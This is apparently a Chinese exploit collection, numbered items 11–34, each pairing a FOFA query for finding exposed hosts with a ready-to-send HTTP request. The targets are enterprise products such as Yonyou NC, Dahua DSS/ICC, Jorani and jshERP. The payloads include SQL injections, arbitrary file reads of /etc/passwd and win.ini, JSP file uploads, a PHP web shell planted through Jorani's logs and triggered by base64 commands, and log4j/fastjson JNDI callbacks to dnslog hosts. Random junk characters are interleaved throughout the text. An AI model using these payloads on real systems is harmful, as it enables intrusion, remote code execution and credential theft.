FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
6 ?4 d( n5 W: N( O- jGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1# ]; I" n$ u& T0 e6 w% |7 `
Host: 127.0.0.1. J/ \( i; O' e3 D! {) x9 g
Pragma: no-cache
* p! q- _' x! K8 J; Z+ W/ e" rCache-Control: no-cache
6 c6 W/ @! j+ Z1 Q3 |' A( lUpgrade-Insecure-Requests: 1
1 g8 x* p2 w3 o3 q" ^4 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
! g6 s, r) }9 t& XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 Z) R3 g) A9 e0 x" _/ F
Accept-Encoding: gzip, deflate
) E+ T. |0 r6 ^$ D) q# ^) y' sAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
. s% e; `( [5 d: p1 R0 oConnection: close
$ o n0 V" m: x' `5 H' @% m6 b/ j" `) G; Z
, M" i/ K K: c$ S2 G z
12. Jorani < 1.0.2 远程命令执行5 R' q$ T z) V; k! s1 \
FOFA:title="Jorani" r5 |5 E6 O+ v
第一步先拿到cookie% I7 M5 L$ c/ }; W- z
GET /session/login HTTP/1.16 V3 T( ^9 D: ]5 [0 o$ b- z2 D$ f
Host: 192.168.190.30" I2 L% k, `6 V9 ~' \4 B* {9 k6 K9 n
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
! }5 \) U/ G5 O$ H* |$ CConnection: close
7 k: P- @, ]+ O! X8 OAccept-Encoding: gzip
3 L* B/ _8 R, a5 M
2 C5 Y. I2 C3 P+ S8 U5 p$ f7 X* e
8 i1 s% m/ `8 H# k$ @响应中csrf_cookie_jorani用于后续请求: O, e/ p C5 |2 R. y d: q; ~; a
HTTP/1.1 200 OK3 ~$ v/ s7 Y. M/ `3 v8 B- I
Connection: close2 l0 n8 S$ d* \; r0 m) S0 t
Cache-Control: no-store, no-cache, must-revalidate
+ n6 Q( O" A5 p/ p/ [3 cContent-Type: text/html; charset=UTF-8/ ~ T l7 g7 W$ h) u5 B* ^2 m
Date: Tue, 24 Oct 2023 09:34:28 GMT
& n. V9 f' r" [Expires: Thu, 19 Nov 1981 08:52:00 GMT! I4 ]* h( D: I& p( n% u# w
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT/ C) A0 h9 g! ~. _
Pragma: no-cache* V! T3 E& D! v: k5 `
Server: Apache/2.4.54 (Debian)8 Q% u1 v; u. J2 X8 L
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
2 u; }" H$ G, H+ ~# Z" D" ?) gSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
9 b$ z4 i2 [: c. i8 B, gVary: Accept-Encoding
: v8 E4 l+ s4 o$ t: ]% A4 T7 Y5 x6 Z
7 D6 Q. p, O5 F& E! {- i
POST请求,执行函数并进行base64编码
1 w! D- q/ Z0 H9 a" E0 H; ePOST /session/login HTTP/1.1
" B0 h" x& Y8 \3 K8 A9 IHost: 192.168.190.302 E$ P0 P1 Z& p' s( _0 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
, V- `" y+ r3 r# {: mConnection: close! C* T$ W- M' m
Content-Length: 252" |/ O1 t2 b+ c) P$ K
Content-Type: application/x-www-form-urlencoded
9 V- u1 c. x) S0 P/ z1 y7 oCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r) s3 c4 }$ y3 N# _# N3 _' r
Accept-Encoding: gzip
5 S; `% B1 B0 @0 {
& V% t! L) ~7 K* pcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
; z6 [5 {+ F6 l" R* B% |/ I, k1 l' @6 W: k1 N f4 A
' d5 i) p! u! e7 t2 x' P! g
; K2 ?7 q$ h4 L7 A6 v$ L! v- b o9 t5 T向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串1 X) ^. ^5 g' C7 ^5 g# C3 N! [" ?2 D" F
GET /pages/view/log-2023-10-24 HTTP/1.1& I- E$ [* M: l9 P) M9 g0 q# k
Host: 192.168.190.30* u8 Z+ O6 h, k4 s. Y; b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36& t! e; \; n* O+ D0 j" v& b
Connection: close
& `) ]- Z! J( f3 U+ [4 gCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r/ `+ q$ j$ I' m+ b( S9 b1 O
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
- S4 k! R- D5 S8 p( u$ o* RX-REQUESTED-WITH: XMLHttpRequest
+ e7 \* }. W% r$ S( SAccept-Encoding: gzip
" Y/ ~. n* L5 F8 B( _: V4 O8 }% [7 e6 p
: E; G6 I: I4 m9 j8 t
13. 红帆iOffice ioFileDown任意文件读取" Z: S- Y% |4 }$ M1 O' q
FOFA:app="红帆-ioffice"! }; \3 m- t9 Q2 u/ y& r/ D* N' y- W. W
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1- ` Z& ], I J8 B8 @6 s, i/ q" N
Host: x.x.x.x- x9 O7 A; w! |- _; L
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
7 `1 }' |8 \2 s) |8 E# p- S' XConnection: close
1 e7 x' M9 |& ^6 Y0 Q* S5 EAccept: */*
5 ?; q- J) N/ q3 zAccept-Encoding: gzip( d# |& E$ E; y+ _/ x: }) U: \
8 a5 _1 Q8 p+ b) Y" {7 ?- k8 x1 c+ h5 I
14. 华夏ERP(jshERP)敏感信息泄露
/ i( L4 h' d3 r! }6 SFOFA:body="jshERP-boot", ^( P. a% [6 ~) X; b1 Y4 t; r
泄露内容包括用户名密码! f: O+ d- P. V1 `
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1, g$ \8 }, ?- V9 h1 p" X
Host: x.x.x.x
4 |/ l; u' S9 l, jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
) D, @, U2 i7 ]* x& kConnection: close
3 T0 v2 ~: S6 d; AAccept: */*! \4 j: ?2 x" I/ Q* ?
Accept-Language: en# f4 u; ]% v# Z+ S
Accept-Encoding: gzip
3 r1 ]' z" Q& B. J8 J" a9 K* j$ ~/ O, r2 s2 C
O l2 m8 r& H
15. 华夏ERP getAllList信息泄露
9 r1 S$ j# L P$ p4 WCVE-2024-0490+ S' d0 C# @2 E
FOFA:body="jshERP-boot"4 d7 N8 t: t* W9 d4 G4 q4 L
泄露内容包括用户名密码6 a8 I) m! q5 f; Z. P+ w( ~8 s
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
, Q9 ~1 ]+ g9 @Host: 192.168.40.130:100
2 |$ N1 D2 o6 p6 y" ]' \1 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36; p, ]! }" T$ z8 g1 _
Connection: close
6 p, r/ e/ o6 F6 TAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.86 e# U `! |& l# b! b
Accept-Language: en4 a4 J2 x6 {# P$ M2 M% h: C
sec-ch-ua-platform: Windows$ T# _4 g7 ^ N- [% {: o
Accept-Encoding: gzip/ O% ?9 B' E9 R2 e
; K# r! q$ R* r. _4 I3 ]
3 e5 Y) s* G, W; ^0 {9 Z
16. 红帆HFOffice医微云SQL注入
6 L+ b& R4 ~2 Y% X( [FOFA:title="HFOffice"+ X- @' @4 r* ]3 i- q# e
poc中调用函数计算1234的md5值
9 a# t ~" \& s' qGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1) f7 g+ D8 x. e" o9 U5 {1 c: n5 V
Host: x.x.x.x
3 }8 y" w+ m$ C B2 kUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36- h& ?1 `* J6 I! P
Connection: close
- o+ n1 j, _0 b3 H# `Accept: */*
1 g0 V9 R2 K- wAccept-Language: en& \# m5 |" U+ F' j+ a
Accept-Encoding: gzip
8 x0 |6 [( }# a' }; K: k$ z0 k/ ~0 T) d# a7 o/ _8 b9 u
( D& r" W5 r1 m% Q
17. 大华 DSS itcBulletin SQL 注入
+ `9 I& M9 k; [* `# m7 l$ e9 vFOFA:app="dahua-DSS"
2 L* Z3 r0 r. m- ~% CPOST /portal/services/itcBulletin?wsdl HTTP/1.1) X3 D- s. H7 z& v; q( x
Host: x.x.x.x
( c. r) S0 c* n9 }4 KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ f9 S$ i! {) _" t9 sConnection: close" f% i. M8 r, s8 X% U! l ?
Content-Length: 345
# j2 `" f" I! w8 J- lAccept-Encoding: gzip: }% L& n; ]! w p9 T( l. O* |
" e# r7 d" E4 N. i9 k4 C
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>( Z% `5 y) a8 |% O( S) i
<s11:Body>
- B1 a2 K6 j3 ?+ [5 O2 v# H& N+ n <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
8 N2 W+ f& s3 M4 R <netMarkings>
% j4 ^) P D K% k0 H* n (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
: d& `1 S6 \! ~3 x) H9 ^& d: J </netMarkings>
- A* z' K9 u! N8 C) c6 z5 X- P </ns1:deleteBulletin>
, L4 h5 V1 l" P* ? </s11:Body>3 P9 e$ N+ i3 s$ Y8 J$ F8 J
</s11:Envelope>
- N4 M3 J2 T+ k. J2 @- {$ g
6 p/ k* A* Y# R9 q% G: u1 M( |" T0 C" [8 x' a: h' @4 O5 E3 i: r
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露7 ]4 R p8 a9 I: f
FOFA:app="dahua-DSS"
! q, r+ a+ Z ]GET /admin/cascade_/user_edit.action?id=1 HTTP/1.13 ~7 ?6 S) ~ Z; a( Z' w
Host: your-ip
; P* y3 r. ~4 X$ M% ]! PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& m4 @) J1 |* z( z j$ l5 |' }
Accept-Encoding: gzip, deflate
) [0 O. p0 d1 w# W$ r: ]' uAccept: */*, O4 z5 W' n$ b" t" N" L- f
Connection: keep-alive2 ?0 r1 f% _: f/ P8 a' y
# P/ z) ~/ W& d$ W+ q8 t: Z7 h$ g
* h$ h3 K) j4 j8 U19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
8 N- I5 f3 Y; kFOFA:app="dahua-DSS"
0 \1 e( ]" C6 E. K) q2 y! t7 W' gGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.18 {5 m# U8 @; X, c
Host:
% y* ?& V- j( h' S0 e+ O3 X! uUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
8 c" }4 l9 k( W4 S) P1 ?- E3 NAccept-Encoding: gzip, deflate
1 P- k0 |: A" h5 I* g+ b6 Y+ p: ~Accept: */* n% s- k+ r+ S' ?7 x4 ]: Z, W- Y* I
Connection: keep-alive3 E2 |: E$ g6 H; Q
; ^; ? {* Q+ ?- L$ ^
5 P! w# _9 K: H- A% P( {2 n20. 大华ICC智能物联综合管理平台任意文件读取
6 v' W% k8 D3 ^: tFOFA:body="*客户端会小于800*"
, k* G1 x$ L2 T- Y5 I# OGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
: ?9 m# ~0 U4 K4 M, Y4 sHost: x.x.x.x' y2 J9 x a8 U. e- D
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 O' |. s% d2 Y: x" C q/ x4 v% E# lConnection: close! h, }7 h: h/ d* J) C& q
Accept: */*$ H, l% a7 v* A4 a" B
Accept-Language: en" c3 [; X! v+ \) M* {
Accept-Encoding: gzip
/ @/ j' a' p/ N" v Z8 i
( |( M% I: E& u% G. ?) U4 a8 R4 F
21. 大华ICC智能物联综合管理平台random远程代码执行
1 \4 K+ U" \; j; K8 R6 N: V1 tFOFA:icon_hash="-1935899595"+ [% e b# F1 _1 I0 d3 d5 }$ b4 a
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
' J# s1 W) L$ o9 [: R0 rHost: x.x.x.x; f, d/ F7 Z, d8 ^6 f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( J8 x0 A5 \2 ~! F6 {
Content-Length: 161
# u5 m: p3 K' p2 O! ~ g/ t2 b) JAccept-Encoding: gzip
i( s4 x) p8 I, K q- rConnection: close; P/ C1 R8 O3 D% Q( _6 L/ h: s- Q
Content-Type: application/json;charset=utf-86 P0 z, }, T% o# _% m# d6 \( A# @- e9 P4 L
0 D: D& ?) ]" @3 V- v7 x{
! \% ?4 ~# j7 N, m! ^2 T; T* E" y"a":{
$ J$ I8 v/ l( W' _ "@type":"com.alibaba.fastjson.JSONObject",. _, _& F- a. d7 s: N( z
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
% s, Q' h8 D9 P R7 A* a }"") B5 T- \# B0 d. z
}# N9 S; Y4 x& P( Z7 ?. ~
. e! g. R, x' y0 F, |" k. X" v
! `( H. r8 ~% D C; @8 z22. 大华ICC智能物联综合管理平台 log4j远程代码执行# P }# l: B, Y) r2 O5 |# a& x
FOFA:icon_hash="-1935899595"4 @+ H6 J; s* b4 s% u+ }" r
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
: U- Q4 B7 V7 A/ k; U& Z; j9 S$ QHost: your-ip
2 m! v! X4 |' o1 ]6 h$ P4 R+ S; g9 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 Z( G$ n/ h3 k- P/ T8 a* EContent-Type: application/json;charset=utf-8
V, h9 i# a* k& ~. y
8 z5 K4 U/ G) A4 \1 L{
0 ~4 I! |, t. N! d( P"loginName":"${jndi:ldap://dnslog}"8 f& j8 u& o9 ^4 o, R7 v) Y
}
0 H3 K& r& E- W% R: h) S. r
+ w/ v; s! g. O: _- T8 q6 ?0 Q% ]- }( W5 V! i! b
+ O/ Z7 l7 T" i5 a; E9 W U( Y
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行- b1 j% d. i: n1 o' F
FOFA:icon_hash="-1935899595"
! _# o) N; d, B4 s$ x( j! zPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
9 j! Z0 m" m. W# r @Host: your-ip
! r5 D6 |* U9 @( o6 H- MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 A2 [' R6 s; Z' JContent-Type: application/json;charset=utf-8+ Q) d0 |! t' u" l4 L, V/ s
Accept-Encoding: gzip
9 U( |; G7 r6 q- E7 `/ Q2 `4 HConnection: close4 {9 o0 |/ k1 c/ W: K) G$ t
& l9 y0 `0 U+ V
{
* D h( Z+ j/ a& N" ] "a":{
* ~/ `- j2 o9 H/ d "@type":"com.alibaba.fastjson.JSONObject",- m( P5 J" q1 r2 a: A
{"@type":"java.net.URL","val":"http://DNSLOG"}
' m: Q2 v) [. q }""# {8 B( X3 t; C+ H' H
}/ l9 U( m# [: o4 d
* Z: ^: k6 R4 J5 _3 g+ B* ]
- t$ i9 g6 {3 ?; D# e7 ^
24. 用友NC 6.5 accept.jsp任意文件上传
6 S; z% u1 X5 Q# L8 CFOFA:icon_hash="1085941792"
) y8 o' b5 d* A; J9 ]4 fPOST /aim/equipmap/accept.jsp HTTP/1.1/ C9 d% L: U( ` w3 c, D
Host: x.x.x.x
1 T' K' r" R4 _. PUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
) H9 j# j6 E( ~7 I5 R% AConnection: close
* X9 r: p8 R1 V8 Y) ~% MContent-Length: 449
6 ?$ Z" l* C+ Y3 _' J/ A- FAccept: */*, k) s7 \2 W, g9 @
Accept-Encoding: gzip
* z s+ p: Z1 ~# G* @$ CContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
/ n2 p' ~# D& V1 D5 s7 Z' s- a Z) _1 e7 }# v/ H0 e. t
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc" @ f9 }# {) r: c* M% E
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"" k; ^8 m5 D/ T% A$ n
Content-Type: text/plain
7 r9 {- ^% B9 g, x1 L
: G* J) q5 \, H7 O<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>$ R0 R: t6 D8 E1 g4 C4 E
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc% a* ~, v; E# o: e# j" a! P9 O; }3 ~
Content-Disposition: form-data; name="fname"
- r) ^7 ], I# q0 l5 o+ J; M4 c( b
# E4 m, \$ e }: e0 P\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
; b2 _% Z" B4 _! C2 V-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--% c: x' ?- q7 ~2 i# j
' A2 F+ C# @# {( d3 D4 [1 Z
& P6 j/ q1 A- I5 Z
25. 用友NC registerServlet JNDI 远程代码执行( @3 I5 N3 }3 w$ |' D& H
FOFA:app="用友-UFIDA-NC"
( _, Y" P7 \7 _POST /portal/registerServlet HTTP/1.1
. l, Y" U F' ~$ K" PHost: your-ip
- o2 c) \4 L8 l% J& g- U3 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
- O! `& S9 F+ e( MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
( u/ n* H% b9 z8 ^# e1 MAccept-Encoding: gzip, deflate* @; T' V7 w% v- s- i4 V! b' t1 |
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
* F% F. X( M1 Z0 W( k6 N, Q( wContent-Type: application/x-www-form-urlencoded$ n* n8 j3 u) E& q4 N2 d' i+ h, S+ q
: [6 M+ C9 d3 b5 N# o
type=1&dsname=ldap://dnslog
: {: x8 s6 t1 e) L/ H) x$ g s/ B& \" U. @8 l8 h
% B# {0 M0 ^- U" r9 [
( |& g5 X+ }; D4 ~26. 用友NC linkVoucher SQL注入6 [2 N6 E) A& Y5 L
FOFA:app="用友-UFIDA-NC"
' P9 u# {7 w- A3 T. c5 UGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 t, [9 |5 h: n/ ]Host: your-ip
( f$ m7 T {& z. {! j% S! U4 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; d2 F5 o5 d+ P; L+ J" N
Content-Type: application/x-www-form-urlencoded
% z4 Y q: C# A/ VAccept-Encoding: gzip, deflate
& i5 w6 B$ M' ~! {/ |3 d) \Accept: */*
0 m1 Y$ }/ l* KConnection: keep-alive
1 j O" l0 D8 N, Q3 @6 U1 O# U
# l# T0 Q+ a1 ^" V; r4 R27. 用友 NC showcontent SQL注入5 e0 B/ s; W7 ]
FOFA:icon_hash="1085941792"
* V! x' }1 W/ L+ bGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
9 A' M6 D" {9 z5 OHost: your-ip
; u1 q) G4 x0 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 V3 i& ^* q2 z" H, i& p
Accept-Encoding: identity- S6 \2 S- o6 N% ^
Connection: close' y6 M2 w$ B, b1 Y; q' `
Content-Type: text/xml; charset=utf-8
! q$ Q% N5 W- n$ o8 C' i! \( ^! L: l' w6 j9 M7 O4 `
& c" Y& h* I: F3 u28. 用友NC grouptemplet 任意文件上传
# `4 s% I) _0 v6 I; \% Y9 DFOFA:icon_hash="1085941792"
, G* d* c1 s3 p" o, I# B4 OPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1. Z# O1 i8 }8 B9 a
Host: x.x.x.x& D. z+ Q/ g. [$ f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
+ n/ p5 K/ }$ Z0 u7 e2 d4 g& fConnection: close
5 H3 j( J* m% u- |. d* F9 G5 _: A" q3 uContent-Length: 268
" S8 O( Z0 y/ j$ gContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
5 B* D1 D) u- p# AAccept-Encoding: gzip% s7 n# \& m/ i$ f9 F$ |9 S T1 M, ]0 _
, d" i0 g1 b, J- h" |2 D------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
) s* t' m; @$ f1 V0 jContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"5 K7 o. ^& P2 d/ f3 C
Content-Type: application/octet-stream
2 |+ K: g3 [3 A7 ~0 A: }/ u
" K7 O; Y2 P6 K9 f2 E7 v* M2 g<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>9 v- W6 c' X; u3 ]: Z
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--, l y$ L& [. g
4 P: ]( q& w I8 d
B/ q+ P1 n0 q+ n- P/uapim/static/pages/nc/head.jsp% N1 H: j7 h Z& U0 H! n8 g3 P2 M
$ D5 ]1 R; a: B, D29. 用友NC down/bill SQL注入
& g# x; `& W/ K9 w2 zFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"& a8 V. W6 e3 C) I
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.10 u. [- k" _2 A0 ^
Host: your-ip. x1 S: K5 K* M8 Q* W% k& i! ^) a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 t1 s* F L3 |) G: B" hContent-Type: application/x-www-form-urlencoded, y. S: ]- }; h! _* i: \, z/ h
Accept-Encoding: gzip, deflate# V1 t! Y! b7 y" O @" [
Accept: */*6 j/ W5 B4 I8 v9 L+ R% ^: o3 A& z
Connection: keep-alive
O& D# g: H. S; H+ ?) H$ ]( ~8 y
, G, A# g. B+ {+ w& K. d" J4 ]/ p. c3 l% \7 K
30. 用友NC importPml SQL注入
( p* o1 F+ B- Q( d8 r m& Q' ~& v. OFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
$ w2 @5 ? r/ r. ?" \POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1. E" n/ C2 E* [% {8 o( J$ P
Host: your-ip9 J) `6 V% O0 ~
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V% l0 B8 M1 M* F- J6 m) m; T; R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
, { y# J. E# b, g% KConnection: close
( g0 o' U% N6 k3 A3 u8 B! J3 C! m: K8 M) @$ X; _ e2 X
------WebKitFormBoundaryH970hbttBhoCyj9V* x6 i( b( Z0 F! L+ U6 U
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
1 Q5 N; |( L: g u$ `. b2 ?( N" D. ~: RContent-Type: image/jpeg$ n; n) G' i$ t6 R( Y
------WebKitFormBoundaryH970hbttBhoCyj9V-- {/ [/ a% Y8 t `. Y1 K. o
: v0 d ?3 M) B) u) \( x, m
" M! R$ e9 A }$ H
31. 用友NC runStateServlet SQL注入0 O* k' r4 N( @" m& N) |% n) s# }
version<=6.59 k7 d6 `# d/ O1 W6 i$ b
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif": F6 Y: g. g5 J5 p9 F
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
, m6 w+ Y7 h6 {' f8 H3 NHost: host) m# d0 | Y) A9 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.369 V: j+ W# t. k2 S, g5 ], Q7 X0 F
Content-Type: application/x-www-form-urlencoded* T: A' X0 i4 N. {: H% e
" f! z" z" x/ P9 M: j) F: P8 C, z" C
32. 用友NC complainbilldetail SQL注入& W1 \& J/ k* p
version= NC633、NC65
" R9 d: ]3 r" M5 p% dFOFA:app="用友-UFIDA-NC"
' ~0 R- `/ C' ^GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
6 g. Z& @( E. g. ~8 AHost: your-ip
% G9 t; D2 d5 \3 ]2 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 E# H9 d! k5 @- t5 \Content-Type: application/x-www-form-urlencoded
: G( L) m& V+ H+ v+ h& WAccept-Encoding: gzip, deflate4 O+ \, P( }1 T f* E6 k. q0 G$ h% [1 ?
Accept: */*
& D" \% \2 k9 J KConnection: keep-alive
6 X9 S* c3 Q G% M( V% {1 O C8 ?+ e" D
; |8 A( h6 S( Y4 ^
33. 用友NC downTax/download SQL注入4 p/ ~4 i/ \ S
version:NC6.5FOFA:app="用友-UFIDA-NC"
$ x1 t5 |, J3 x1 g D' ZGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
% f$ \" h0 h3 {: tHost: your-ip
% g) f$ Z; V" x5 F9 W* x! Z3 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( ~6 l0 O6 i- ]3 jContent-Type: application/x-www-form-urlencoded
6 W! ? ?* d+ U3 Q9 k! q" P$ T2 [Accept-Encoding: gzip, deflate, a$ k) \ `$ s& X q( `( p3 T
Accept: */*4 u9 c; n3 y4 i# Z/ U! }
Connection: keep-alive
5 ~1 S; f t8 n
- n. z3 ` r2 ]1 X2 L9 n/ p9 o( G: e- o$ V( a% ]2 Y
34. 用友NC warningDetailInfo接口SQL注入3 y: D' C2 [, Q4 }
FOFA:app="用友-UFIDA-NC"% L8 k9 R9 ?0 v$ s
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1- I2 h2 d# n, b! r# m) `
Host: your-ip% F# m" g' p0 y% F* a: R1 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" q9 d/ n! T) |& \0 u+ v
Content-Type: application/x-www-form-urlencoded
+ q8 z- T0 V8 s% G$ F$ _Accept-Encoding: gzip, deflate# v* \& C \9 c0 V0 k. }
